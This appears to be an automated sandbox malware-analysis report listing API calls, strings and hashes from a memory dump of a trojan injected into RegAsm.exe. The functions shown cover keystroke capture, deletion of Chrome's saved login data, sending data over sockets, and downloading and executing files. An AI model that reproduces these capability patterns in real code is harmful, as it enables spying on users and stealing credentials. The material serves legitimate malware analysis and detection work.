                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Find$CreateFirstNext
                                                                                                                          • String ID: 02x$8SG$PXG$PXG$NG
                                                                                                                          • API String ID: 341183262-4134892317
                                                                                                                          • Opcode ID: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                                                                                                                          • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                                                                          • Opcode Fuzzy Hash: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                                                                                                                          • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1888522110-0
                                                                                                                          • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                                                          • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                                                                          • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                                                          • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                                                                          APIs
                                                                                                                          • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                          • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                          • API String ID: 2127411465-314212984
                                                                                                                          • Opcode ID: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                                                                                                                          • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                                                                                          • Opcode Fuzzy Hash: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                                                                                                                          • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 00449292
                                                                                                                          • _free.LIBCMT ref: 004492B6
                                                                                                                          • _free.LIBCMT ref: 0044943D
                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                                                          • _free.LIBCMT ref: 00449609
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 314583886-0
                                                                                                                          • Opcode ID: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                                                                                          • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                                                                                          • Opcode Fuzzy Hash: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                                                                                          • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                                            • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                                            • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                                            • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                                            • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                                                          • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                          • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                                                          • API String ID: 1589313981-2876530381
                                                                                                                          • Opcode ID: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                                                                          • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                                                                          • Opcode Fuzzy Hash: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                                                                          • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                                                                          APIs
                                                                                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                                                          • GetLastError.KERNEL32 ref: 0040BA93
                                                                                                                          Strings
                                                                                                                          • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                                                          • UserProfile, xrefs: 0040BA59
                                                                                                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                                                                          • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: DeleteErrorFileLast
                                                                                                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                          • API String ID: 2018770650-1062637481
                                                                                                                          • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                                                          • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                                                                          • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                                                          • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                                                                          APIs
                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                                          • GetLastError.KERNEL32 ref: 004179D8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                          • String ID: SeShutdownPrivilege
                                                                                                                          • API String ID: 3534403312-3733053543
                                                                                                                          • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                                          • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                                                                          • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                                          • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                                                                          APIs
                                                                                                                          • __EH_prolog.LIBCMT ref: 00409293
                                                                                                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,02384988,00000010), ref: 004048E0
                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                                                                            • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                            • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                            • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                                                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1824512719-0
                                                                                                                          • Opcode ID: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                                                                                          • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                                                                                          • Opcode Fuzzy Hash: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                                                                                          • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                                                                          APIs
                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 276877138-0
                                                                                                                          • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                                          • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                                                                          • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                                          • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                                                                          APIs
                                                                                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                                                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                                                                                          • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoLocale
                                                                                                                          • String ID: ACP$OCP
                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                          • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                                          • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                                                                          • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                                          • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                                                                          APIs
                                                                                                                          • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F419,00000000), ref: 0041B54A
                                                                                                                          • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                                                                          • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                                                                          • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                          • String ID: SETTINGS
                                                                                                                          • API String ID: 3473537107-594951305
                                                                                                                          • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                                                          • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                                                                                          • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                                                          • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                                                                                          APIs
                                                                                                                          • __EH_prolog.LIBCMT ref: 004096A5
                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                                                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1157919129-0
                                                                                                                          • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                                                                          • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                                                                                          • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                                                                          • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                                                                          APIs
                                                                                                                          • __EH_prolog.LIBCMT ref: 0040884C
                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1771804793-0
                                                                                                                          • Opcode ID: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                                                                                                                          • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                                                                                          • Opcode Fuzzy Hash: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                                                                                                                          • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                                                                                          APIs
                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                                                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: DownloadExecuteFileShell
                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                                                                          • API String ID: 2825088817-3056885514
                                                                                                                          • Opcode ID: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                                                                                                                          • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                                                                                          • Opcode Fuzzy Hash: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                                                                                                                          • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$FirstNextsend
                                                                                                                          • String ID: XPG$XPG
                                                                                                                          • API String ID: 4113138495-1962359302
                                                                                                                          • Opcode ID: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
                                                                                                                          • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                                                                                          • Opcode Fuzzy Hash: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
                                                                                                                          • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                                                                                          APIs
                                                                                                                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                            • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                                            • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                                                            • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                          • API String ID: 4127273184-3576401099
                                                                                                                          • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                                                                          • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                                                                          • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                                                                          • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                          • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
